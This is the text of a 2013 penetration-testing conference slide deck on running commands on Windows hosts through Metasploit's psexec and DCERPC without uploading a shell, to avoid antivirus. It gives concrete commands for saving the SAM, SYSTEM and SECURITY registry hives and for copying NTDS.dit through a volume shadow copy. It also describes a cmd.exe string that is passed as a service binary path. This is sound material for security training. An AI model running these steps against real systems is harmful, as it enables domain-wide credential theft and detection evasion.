The document discusses techniques for conducting penetration tests without uploading binary shells to target systems, focusing on tools like psexec and dcerpc to perform various tasks such as command execution and password hash dumping. It emphasizes the risks associated with binary shell uploads and presents methods for utilizing existing modules in Metasploit to achieve desired outcomes without detection. Additionally, the document includes practical examples and code snippets for executing commands and gathering sensitive data securely.

1. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
Owning Computers
Without Shell Access

2. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Husband & Father
• Pentester: Accuvant LABS
• Cofounder: http://www.pentestgeek.com
• Author: jigsaw.rb
• Twitter: @R3dy__
WTF is Royce Davis?

3. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Uploading Binary Shells Is No Good
• Techniques To Avoid Shell Upload
• Metasploit Modules
• Command Execution
• Local & Cached Hash Dumping
• Other Possibilities
• Demo Modules
Talk Synopsis

4. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Imagine that you’re on a pentest and discover a LHF
vulnerability that gives you the local admin hash to
all the boxes.
• You try to use the psexec exploit module to pop a
meterpreter shell on multiple systems only to get
flagged by AV and stopped dead in your tracks.
• What do you do now?
• Enter SMBExec (Eric Milam a.k.a @Brav0hax)
• SMBExec is a great tool, however it still uploads a
binary to the target
Background Story

5. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• We’ve been uploading shells to take control of remote
hosts since the beginning of time so what’s the big
deal?
• Shells contain binary signatures that can be
recognized and blocked
• Obfuscation only creates a different signature that
could still be recognized and blocked
• Shells can die leaving us with no way back into the
target machine
• They can also leave remnants of themselves
Uploading Binary Shells Is No Good

6. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
If we’re going to bypass using shells on pentests we need to first
identify what purpose they serve and what additional functions to
they provide.
• Command execution
• Search the file system
• Create users
• Enumerate network resources
• Upload/download files
• Etc…
• Grab local/cached password hashes
• Dump all AD hashes from the DC
• Any others?
What Can We Do With A Shell?

7. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
Enter ‘psexec.rb’
• Metasploit already has several modules that use
DCERPC to make direct authenticated requests
to Windows APIs
• /exploit/windows/smb/psexec.rb
• Creates & Uploads a binary payload to the target over
SMB
• Sends an RPC to the Service Control Manager (SCM)
• UUID: ‘367abb81-9844-35f1-ad32-98f038001003’
• Creates a service, starts it, cleans up after…
• MSDN Documentation
• http://msdn.microsoft.com/en-
us/library/windows/desktop/ms685942%28v=vs.85%29.aspx
Using Native Windows Functions

8. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
DCERPC Requests:
The dcerpc.call instance method takes in two parameters. The first parameter is the
opcode reference to the particular Windows function you wish to call. The second
parameter is the function arguments in NDR (Network Data Representation) Format.
• dcerpc.call(0x0f, stubdata) – OpenSCManager
• dcerpc.call(0x0c, stubdata) – CreateService
• dcerpc.call(0x0, svc_handle) – CloseServiceHandle
• dcerpc.call(0x10, stubdata) – OpenService
• dcerpc.call(0x13, stubdata) – StartService
• dcerpc.call(0x02, stubdata) – DeleteService
• dcerpc.call(0x0, svc_handle) - CloseServiceHandle
Inside psexec.rb

9. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• This is what it looks like inside Metasploit’s
psexec exploit module written by HDM
Psexec.rb Cont.
exploit/windows/smb/psexec.rb (line 254)

10. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• This is the format accepted by the CreateService
function
• http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx
CreateService

11. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• lpBinaryPathName [in, optional]
• The fully qualified path to the service binary file. If the path contains a space, it must be
quoted so that it is correctly interpreted. For example, "d:my sharemyservice.exe"
should be specified as ""d:my sharemyservice.exe"".
• The path can also include arguments for an auto-start service. For example,
"d:mysharemyservice.exe arg1 arg2". These arguments are passed to the service
entry point (typically the main function).
• If you specify a path on another computer, the share must be accessible by the
computer account of the local computer because this is the security context used in the
remote call. However, this requirement allows any potential vulnerabilities in the
remote computer to affect the local computer. Therefore, it is best to use a local file.
• psexec.rb looks like this:
• C:HjeKOplsYutVmBWn.exe  Probably a Meterpreter payload
• What if we tried this instead:
• C:windowssystem32cmd.exe /C echo dir C: ^> outputfile.txt > launchfile.bat &
C:windowssystem32cmd.exe /C launchfile.bat”
lpBinaryPathName MSDN Definition

12. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
In order to provide accessibility to this functionality for other modules we
created a mixin which has been graciously accepted into the MSF.
lib/msf/core/exploit/smb/psexec.rb
• Slightly modified version of the original psexec.rb code wrapped in a
function which excepts a Windows command in the following format:
• [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND]
• The method is called like so ‘return psexec(command)’
• Returns ‘true’ if execution was successful
• Major difference is it does not try to delete cmd.exe after execution
• Also contains a ‘smb_read_file(smbshare, host, file)’ method for
convenient retrieval of command output
The Psexec Mixin

13. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Review the source code
• Explain some of my favorite uses related to
pentesting
• Demo the module
Demo psexec_command.rb

14. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Current methods for dumping password hashes
• Post modules that require a meterpreter shell
• Upload a standalone binary like pwdump/fgdump…
• These methods extract specific registry key values
from the SYSTEM, SECURITY, and/or SAM registry
hive
• This process can flag antivirus
• We need to somehow retrieve a copy of the registry hives
and extract the hashes from them offline on our attacking
system
• We can look at the code from pwdump.py from the
creddump suite.
Dumping Password Hashes

15. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
1. Authenticate to the system using a password/hash
2. Use the psexec mixin to execute the following Windows Commands:
• reg.exe save HKLMSAM c:windowstempsam
• reg.exe save HKLMSYSTEM c:windowstempsys
• reg.exe save HKLMSECURITY c:windowstempsec
3. Download the registry hive copies to our attacking machine
4. Remove the registry hive copies from the target
5. Open the registry hive copies on our attacking machine and extract the
password hashes
Offline Password Hash Dumping

16. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Thank you to:
• Brendan Dolan-Gavitt author of ‘creddump’.
• Carlos Perez – smart_hashdump.rb and other
modules
• Brandon Perry – tools/reg.rb
• Review the source code
• Demo the module
Demo hashgrab.rb & cachegrab.rb

17. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• The holy grail of most network pentests can be found
inside an ESE (Extensible Storage Engine) database
called NTDS.dit located on the Domain Controller
• Protected by operating system
• Requires inject into lsass and/or other black
magics
• Contains a BOAT LOAD of information about the
system
• Including password hashes and usernames for all
AD accounts!
Dumping All the Hashes

18. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
We can use the psexec_ntdsgrab module to create or target an existing VSC (Volume Shadow Copy) and
safely pull down a copy of NTDS.dit to our attacking machine.
auxiliary/admin/smb/psexec_ntdsgrab.rb
1. Use psexec mixin to execute windows commands for creating a VSC
• vssadmin create shadow /For=%SYSTEMDRIVE%
2. Query vssadmin for the path to the newly created VSC
• vssadmin list shadows
3. Copy NTDS.dit from the VSC to the WINDOWSTemp directory
• copy /Y ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WINDOWSNTDSNTDS.dit C:WINDOWSTempntds
4. Use reg.exe to make a copy of the SYSTEM registry hive
5. Download the ‘ntds’ and ‘sys’ files to attacking machine
6. Cleanup after ourselves
Enter psexec_ntdsgrab.rb

19. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• We’ll need to use the ‘libesedb’ C library to extract the right
tables from NTDS.dit
• $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz$
• $ tar xvzf libesedb-alpha-20120102.tar.gz
• $ cd libesedb-20120102/
• $ ./configure
• $ make && make install
• Once libesedb is compiled we will use esedbexport located in the ‘libesedb-
20120102/esedbtools’ to export the datatable which contains the user account
password hashes for AD
• http://www.pentestgeek.com/2012/11/16/dumping-domain-password-
hashes-using-metasploit-ntds_hashextract-rb/
Getting What We Want From NTDS.dit

20. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Grab NTDS.dit using MSF module
• Export tables from NTDS.dit using libesedb
• Extract hashes from exported datatable using
ntds_hashextract.rb
Demo psexec_ntdsgrab.rb

21. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
• Uploading a binary shell to the target can be harmful
to a penetration test
• DCERPC allows us to do a lot of the functions we
would ask of a binary shell without uploading one to
the target
• Metasploit modules already exist to achieve remote
command execution, grab local/cached password
hashes and dump AD hashes from a DC
• The sky is the limit as to what else we could do if we
all chose to adapt this style of thinking
Closing

22. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
Questions & Answers
10/4/201321

23. Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
Owning Computers Without Shell Access
10/4/201322
Thank You!
Royce Davis
Accuvant LABS
Senior Consultant – Attack & Pen Team
royce.e.davis@gmail.com
http://www.pentestgeek.com
@R3dy__